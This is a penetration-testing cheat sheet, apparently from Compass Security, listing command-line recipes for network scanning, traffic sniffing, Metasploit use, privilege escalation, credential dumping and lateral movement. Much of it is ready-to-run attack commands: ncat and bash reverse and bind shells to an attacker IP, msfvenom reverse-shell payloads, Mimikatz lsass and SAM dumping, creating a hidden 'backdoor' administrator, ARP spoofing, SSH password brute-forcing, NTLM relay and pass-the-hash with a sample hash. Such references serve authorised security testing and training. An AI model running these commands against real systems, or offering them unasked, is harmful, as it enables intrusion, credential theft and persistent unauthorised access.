Hacking Tools Cheat Sheet: Basic Linux Networking Tools

This document provides a summary of hacking and security tools. It lists tools for tasks like network scanning, vulnerability scanning, sniffing network traffic, web application testing, and obtaining remote shells. The document summarizes the purpose and basic usage of tools like Nmap, tcpdump, curl, ncat, OpenSSL, and others. Examples are provided for commands to perform common networking and penetration testing functions like port scanning, certificate inspection, and creating bind shells.

Hacking Tools Cheat Sheet
Compass Security, Version 1.1, January 2020
https://www.compass-security.com

Basic Linux Networking Tools

Show IP configuration:
# ip a l

Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up

Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0

DNS lookup:
# dig compass-security.com

Reverse DNS lookup:
# dig -x 10.5.23.42

Information Gathering

Find owner/contact of domain or IP address:
# whois compass-security.com

Get nameservers and test for DNS zone transfer:
# dig example.com ns
# dig example.com axfr @n1.example.com

Get hostnames from CT logs: search for %.compass-security.com on https://crt.sh.
Or using an nmap script:
# nmap -sn -Pn compass-security.com --script hostmap-crtsh

Combine various sources for subdomain enumeration:
# amass enum -src -brute -min-for-recursive 2 -d compass-security.com

TCP Tools

Listen on TCP port:
# ncat -l -p 1337

Connect to TCP port:
# ncat 10.5.23.42 1337

TLS Tools

Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=example.org/"

Start TLS server:
# ncat --ssl -l -p 1337 --ssl-cert cert.pem --ssl-key key.pem

Connect to TLS service:
# ncat --ssl 10.5.23.42 1337

Connect to TLS service using openssl:
# openssl s_client -connect 10.5.23.42:1337

Show certificate details:
# openssl s_client -connect 10.5.23.42:1337 | openssl x509 -text

Test TLS server certificate and ciphers:
# sslyze --regular 10.5.23.42:443

TCP to TLS proxy:
# socat TCP-LISTEN:2305,fork,reuseaddr ssl:example.com:443

Online TLS tests:
▪ ssllabs.com, hardenize.com

HTTP Tools

Start Python webserver on port 2305:
# python3 -m http.server 2305

Perform HTTP request:
# curl http://10.5.23.42:2305/?foo=bar

Useful curl options:
▪ -k: Accept untrusted certificates
▪ -d "foo=bar": HTTP POST data
▪ -H "Foo: Bar": HTTP header
▪ -I: Perform HEAD request
▪ -L: Follow redirects
▪ -o foobar.html: Write output file
▪ --proxy http://127.0.0.1:8080: Set proxy

Scan for common files/applications/configs:
# nikto -host https://example.net

Enumerate common directory/file names:
# gobuster dir -k -u https://example.net -w /usr/share/wordlists/dirb/common.txt

Sniffing

ARP spoofing:
# arpspoof -t 10.5.23.42 10.5.23.1

Or a graphical tool:
# ettercap -G

Show ARP cache:
# ip neigh

Delete ARP cache:
# ip neigh flush all

Sniff traffic:
# tcpdump [options] [filters]

Useful tcpdump options:
▪ -i interface: Interface, or any for all
▪ -n: Disable name and port resolution
▪ -A: Print in ASCII
▪ -XX: Print in hex and ASCII
▪ -w file: Write output PCAP file
▪ -r file: Read PCAP file

Useful tcpdump filters:
▪ not arp: No ARP packets
▪ port ftp or port 23: Only port 21 or 23
▪ host 10.5.23.31: Only from/to host
▪ net 10.5.23.0/24: Only from/to hosts in network

Advanced sniffing using tshark or Wireshark.

Sniffing over SSH on a remote host:
# ssh 10.5.23.42 tcpdump -w- port not ssh | wireshark -k -i -

Search in network traffic:
# ngrep -i password

Show HTTP GET requests:
# urlsnarf

Show transmitted images:
# driftnet

Network Scanning

ARP scan:
# nmap -n -sn -PR 10.5.23.0/24

Reverse DNS lookup of IP range:
# nmap -sL 10.5.23.0/24

Nmap host discovery (ARP, ICMP, SYN 443/tcp, ACK 80/tcp):
# nmap -sn -n 10.5.23.0/24

TCP scan (SYN scan = half-open scan):
# nmap -Pn -n -sS -p 22,25,80,443,8080 10.5.23.0/24

List Nmap scripts:
# ls /usr/share/nmap/scripts

Scan for EternalBlue vulnerable hosts (SMB listens on 445/tcp):
# nmap -n -Pn -p 445 --script smb-vuln-ms17-010 10.5.23.0/24

Scan for vulnerabilities (script category filter):
# nmap -n -Pn --script "vuln and safe" 10.5.23.0/24

Performance tuning (1 SYN packet ≈ 60 bytes → 20'000 packets/s ≈ 10 Mbps):
# nmap -n -Pn --min-rate 20000 10.5.23.0/24

Useful nmap options:
▪ -n: Disable name and port resolution
▪ -PR: ARP host discovery
▪ -Pn: Disable host discovery
▪ -sn: Disable port scan (host discovery only)
▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan
▪ --top-ports 50: Scan 50 top ports
▪ -iL file: Host input file
▪ -oA file: Write output files (3 types)
▪ -sC: Script scan (default scripts)
▪ --script <file/category>: Specific scripts
▪ -sV: Version detection
▪ -6: IPv6 scan

The target can be specified using CIDR notation (10.5.23.0/24) or range definitions (10.13-37.5.1-23).

Fast scan using masscan:
# masscan -p80,8000-8100 --rate 20000 10.0.0.0/8

Public internet scan databases:
▪ shodan.io, censys.io

Shells

Start bind shell (on victim):
# ncat -l -p 2305 -e "/bin/bash -i"

Connect to bind shell (on attacker):
# ncat 10.5.23.42 2305

Listen for reverse shell (on attacker):
# ncat -l -p 23

Start reverse shell (on victim):
# ncat -e "/bin/bash -i" 10.5.23.5 23

Start reverse shell with bash only (on victim):
# bash -i &>/dev/tcp/10.5.23.5/42 0>&1

Upgrade to pseudo terminal:
# python -c 'import pty; pty.spawn("/bin/bash")'

Vulnerability DBs and Exploits

Exploit search (local copy of the Exploit-DB):
# searchsploit apache

Show exploit file path and copy it into clipboard:
# searchsploit -p 40142

Online vulnerability and exploit databases:
▪ cvedetails.com, exploit-db.com, packetstormsecurity.com

Cracking

Try SSH passwords from a wordlist:
# ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24

Determine hash type:
# hashid 869d[...]bd88

Show example hash types for hashcat:
# hashcat --example-hashes

Crack hashes (e.g. 5600 for NetNTLMv2 type):
# hashcat -m 5600 -a 0 hash.txt /path/to/wordlists/*

Crack hashes using John the Ripper:
# john hashes.txt

Metasploit Framework

Start Metasploit:
# msfconsole

Search exploit:
> search eternalblue

Use exploit:
msf > use exploit/windows/smb/ms17_…

Configure exploit:
msf exploit(…) > show options
msf exploit(…) > set TARGET 10.5.23.42

Run exploit:
msf exploit(…) > exploit

Generate reverse shell (WAR):
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip address> LPORT=443 -f war > sh.war

Reverse shell listener:
> use exploit/multi/handler
> set payload linux/x64/shell_reverse_tcp
> set LHOST 10.5.23.42 # attacker
> set LPORT 443
> exploit

Upgrade to Meterpreter (or press ^Z (Ctrl-Z)):
background
Background session 1? [y/N] y
> sessions # list sessions
> sessions -u 1 # upgrade
> sessions 2 # interact with session 2
meterpreter > sysinfo # use it

Upload / download files:
meterpreter > upload pwn.exe
meterpreter > download c:\keepass.kdb

Execute a file:
meterpreter > execute -i -f /your/bin

Port forwarding to localhost:
meterpreter > portfwd add -l 2323 -p 3389 -r 10.5.23.23

Background Meterpreter session:
meterpreter > background

Pivoting through existing Meterpreter session:
> use post/multi/manage/autoroute
> set session 2 # meterpreter session
> run
> route

SOCKS via Meterpreter (requires autoroute):
> use auxiliary/server/socks4a
> set SRVPORT 8080
> run

Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080

Connect through SOCKS proxy:
# proxychains ncat 172.23.5.42 1337

Linux Privilege Escalation

Enumerate local information (-t for more tests):
# curl -o /tmp/linenum https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# bash /tmp/linenum -r /tmp/report

Other hardening checks can be done using lynis or LinPEAS.
Use sudo/SUID/capabilities/etc. exploits from gtfobins.github.io.

Windows Privilege Escalation

Copy PowerUp.ps1 from GitHub "PowerShellMafia/PowerSploit" into PowerShell to bypass ExecutionPolicy and execute Invoke-AllChecks. Use the abuse functions.

Add a new local admin:
C:\> net user backdoor P@ssw0rd23
C:\> net localgroup Administrators backdoor /add

Scan for network shares:
# smbmap.py --host-file smbhosts.txt -u Administrator -p PasswordOrHash

Windows Credentials Gathering

Start Mimikatz and create log file:
C:\> mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log

Read lsass.exe process dump:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.

Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords

Backup SYSTEM & SAM hive:
C:\> reg save HKLM\SYSTEM system.hiv
C:\> reg save HKLM\SAM sam.hiv

Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv /sam:sam.hiv

Pass-the-Hash

Shell via pass-the-hash (Impacket tools):
# ./psexec.py -hashes :011AD41795657A8ED80AB3FF6F078D03 domain/[email protected]

Over a subnet and extract SAM file:
# crackmapexec -u Administrator -H :011AD41795657A8ED80AB3FF6F078D03 10.5.23.0/24 --sam

Browse shares via pass-the-hash:
# ./smbclient.py domain/[email protected] -hashes :011AD41795657A8ED80AB3FF6F078D03

RDP via pass-the-hash:
# xfreerdp /u:user /d:domain /pth:011AD41795657A8ED80AB3FF6F078D03 /v:10.5.23.42

Meterpreter via pass-the-hash:
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 10.5.23.42 # attacker
msf > set LPORT 443
msf > set RHOST 10.5.23.21 # victim
msf > set SMBPass 01[...]03:01[...]03
msf > exploit
meterpreter > shell
C:\WINDOWS\system32>

NTLM Relay

Vulnerable if message_signing: disabled:
# nmap -n -Pn -p 445 --script smb-security-mode 10.5.23.0/24

Disable SMB and HTTP in Responder.conf and start Responder:
# ./Responder.py -I eth0

NTLM relay to target and extract SAM file:
# ./ntlmrelayx.py -smb2support -t smb://10.5.23.42

NTLM relay using SOCKS proxy:
# ./ntlmrelayx.py -tf targets.txt -smb2support -socks

Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080

Access files via SOCKS proxy:
# proxychains smbclient -m smb3 '\\10.5.23.42\C$' -W pc05 -U Administrator%invalidPwd

Active Directory

Use SharpHound to gather information and import it into BloodHound to analyze.
Download PingCastle from pingcastle.com and generate a report.

More Online References

▪ GitHub "swisskyrepo/PayloadsAllTheThings"
▪ GitHub "danielmiessler/SecLists"
▪ GitHub "enaqx/awesome-pentest"
